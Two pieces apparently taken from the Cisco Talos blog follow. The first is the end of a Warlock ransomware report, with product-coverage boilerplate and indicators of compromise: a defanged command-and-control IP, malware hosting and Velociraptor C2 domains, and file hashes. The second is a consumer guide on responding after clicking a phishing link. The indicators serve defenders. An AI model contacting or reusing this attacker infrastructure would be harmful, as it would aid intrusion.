Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following ClamAV cover this threat:  
Win.Ransomware.Warlock-10057029-0  

IOCs 

IOCs for this research can also be found at our GitHub repository here.

C2/exfiltration IP address: 
65.38.[121][.]226 

Domain hosting malicious MSI: 
stoaccinfoniqaveeambkp.blob.core.windows[.]net 

Velociraptor C2 server: 
velo.qaubctgg.workers[.]dev 

Velociraptor:Legitimate tool used by the adversary for persistence 
Velociraptor installer – 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421 
Velociraptor.exe – 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7 
Malicious Velociraptor config.yaml – A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023  

Internal Monologue NTLM downgrade malware: 
In.exe- C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A  

Cisco Talos Blog – ​Read More

October is Cybersecurity Awareness Month, and as the tech-savvy friend or family member, people probably come to you for advice. One of the most common questions is: “I clicked a suspicious link. What do I do now?” 

Don’t worry — panic won’t help, but a calm, step-by-step response will. Share this guide with your loved ones so everyone knows exactly how to respond and stay safe. 

If you clicked the link on a work device, immediately contact IT support and follow their instructions. Companies often have specific policies and tools to investigate and remediate security incidents. Quick reporting helps protect both you and your organization. 

If it’s a personal device, here’s what to do next.

Scenario 1: You only clicked the link, and did not enter any information 

Clicking a malicious link can trigger automatic downloads, attempt to exploit browser vulnerabilities, or install malware without your knowledge. 

• Exit the browser immediately. 
• Make sure no files downloaded to your device; if so, delete them without opening. 
• Monitor your device for unusual behavior, which can be a sign of malware. 
  • Examples: Higher-than normal battery drainage, apps crashing, unknown apps/profiles, and persistent pop-ups 
• Stay alert for suspicious emails, texts, or calls.

Together, these steps help you catch and remove any threats before they cause harm, and keep you aware of follow-up attacks.

Scenario 2: You entered your username and password 

Entering credentials on a phishing site can give attackers access to your account, leading to unauthorized activity, identity theft or further phishing. 

• Change your password immediately for that account, and force a logout of all devices logged in. This locks out any unauthorized users who may have gained access. 
• If you have multifactor authentication (MFA) enabled, watch for any push notifications that you did not initiate. Do not approve them. This could mean someone is actively trying to log in with your stolen credentials. 
• Enable two-factor authentication (2FA) if available. 
• Create new, unique passwords for any other accounts that used the same credentials. Attackers often try your compromised password on multiple sites (aka called credential stuffing). 
  • Tip: Instead of storing your credentials in your browser, use a password manager such as 1Password. 
• Watch for suspicious account activity.

By following these steps, you limit the attacker’s access and protect your other accounts from being compromised. 

Scenario 3: You entered credit card or banking information 

Financial data can be quickly exploited for fraudulent transactions, identity theft, or even sold on the dark web. 

• Contact your bank or card issuer right away. 
• If possible, freeze your card and get a replacement. 
• Monitor your statements and report any unauthorized charges. 
• Enable fraud alerts if your bank offers them.

These actions help you contain the risk, minimize financial losses, and alert your bank to potential fraud on your account.

Scenario 4: You downloaded or opened a file 

Downloaded files from suspicious links can contain malware, ransomware, spyware or other harmful software that may steal your data or harm your device. 

• Disconnect your device from the internet until you have completed all of these steps. Isolating your device can prevent malware from communicating with attackers or spreading to other devices. 
• Run a full antivirus and malware scan if on a desktop or laptop. 
• Check to ensure no new apps were installed if on a phone. 
• Delete any suspicious files. 
• In a worst-case scenario, if you have conducted periodic backups it might be best to restore your device to a clean version, from before the file was downloaded.

Remember to: 

• Always verify links before you click on them.  
  • Tip: Hover over the link to make sure it leads to an official website. If you’re not sure, it’s safer to type in the URL manually. 
• Enable multifactor authentication for your accounts whenever it’s available. 
• Keep your software and antivirus updated. 
• Report all phishing attempts to your email provider and IT/security team. 

Phishing attacks are getting more sophisticated, but a little knowledge goes a long way. Share this guide with your friends and family so they’ll know what to do if they ever click a suspicious link.

Happy Cybersecurity Awareness Month from Cisco Talos!

Cisco Talos Blog – ​Read More